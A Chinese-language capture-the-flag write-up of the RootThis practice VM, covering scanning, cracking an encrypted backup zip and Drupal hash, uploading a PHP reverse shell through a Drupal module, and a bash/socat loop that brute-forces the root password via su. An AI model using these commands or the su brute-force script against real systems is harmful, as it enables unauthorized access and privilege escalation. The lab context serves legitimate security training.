RootThis靶机复盘

RootThis靶机复盘

在这个靶机中收获良多,首先学会了一个新的交互方式,不需要用python了,同时知道了什么是静态链接文件,还有就是学会了遇到数据库文件应该怎么解决。

/usr/bin/script -qc /bin/bash /dev/null
静态链接版本的程序包含了所有的库文件,一个文件就够了,运行不用下载别的库。

正文:

这个靶机我放扫描ip的图片了,这里扫描到一个drupal,这个是我们之前做DC靶机系列时候就遇到过,backup目录是一个加密的zip文件,我们下载到本机上来。

ip扫描,查找靶机地址

nmap -sP 192.168.102.0/24

对靶机进行一个单独的扫描.

nmap -A 192.168.102.175 -p-

扫描目录

dirsearch -u http://192.168.102.175

RootThis靶机复盘_第1张图片

RootThis靶机复盘_第2张图片

把因为加密的,我们用工具爆破一下,很快密码就出来了,解压后发现里面是一个数据库。

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt backup.zip

RootThis靶机复盘_第3张图片

RootThis靶机复盘_第4张图片

我们打开kali自带的数据库,然后把这个数据库放进去,这样方便我们查看数据库内容,发现多了一个新的数据库。

service mariadb start 
source dump.sql

RootThis靶机复盘_第5张图片

打开这个数据库,并显示里面的表。

use drupaldb
show tables;

RootThis靶机复盘_第6张图片

看到里面有一个users表,我们查看一下里面内容,发现有一个用户名和一个加密的密码。

RootThis靶机复盘_第7张图片

我们用john来爆破一下密码,很快密码就出来了。

RootThis靶机复盘_第8张图片

这样就可以登陆上我们这个网站了。

RootThis靶机复盘_第9张图片

因为以前遇到过这样的CMS,所以知道是个什么结构,我们可以加一个PHP插件,这样就能反弹shell到我们的kali上了。

RootThis靶机复盘_第10张图片

RootThis靶机复盘_第11张图片

RootThis靶机复盘_第12张图片

kali中有自带的反弹shell脚本,我们找到并复制到这个网站上去。

RootThis靶机复盘_第13张图片

把ip和端口号都写程我们自己的。

RootThis靶机复盘_第14张图片

这样我们就拿到了一个shell,因为这个靶机没有python。

我们可以用下面语句得到一个正宗的shell。

/usr/bin/script -qc /bin/bash /dev/null

RootThis靶机复盘_第15张图片

我们进去以后发现一个文件,里面提醒说rockyou.txt文件中前300行有root用户的密码。

RootThis靶机复盘_第16张图片

我们把rockyou.txt的前300行取出来放到300.txt中去,然后下载到靶机的/tmp目录中。

这300个密码实在太多了,我们不能一条一条爆破,所以我们需要写一个bash进行爆破,就用到了下面代码。

bash需要socat工具,我们可以下载静态socat文件,所有需要的库都包含到这里面的。

RootThis靶机复盘_第17张图片

静态链接版本的socat程序包含了所有的库文件,因此不需要在系统上安装任何依赖项。

静态socat下载地址。

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

a.sh文件内容

#!/bin/bash

for i in `cat 300.txt`
do
	echo "$i"
	(sleep 0.1; echo "$i") | ./socat - EXEC:'bash -c "su -c id"',pty
	
done

image-20230714204306919

给a.sh和socat加上x权限。

在bash a.sh运行,到root密码的时候就会暂停了。

RootThis靶机复盘_第18张图片

这样我们就成功拿到了root权限。

RootThis靶机复盘_第19张图片

你可能感兴趣的:(打靶机系列,linux,web安全,网络安全)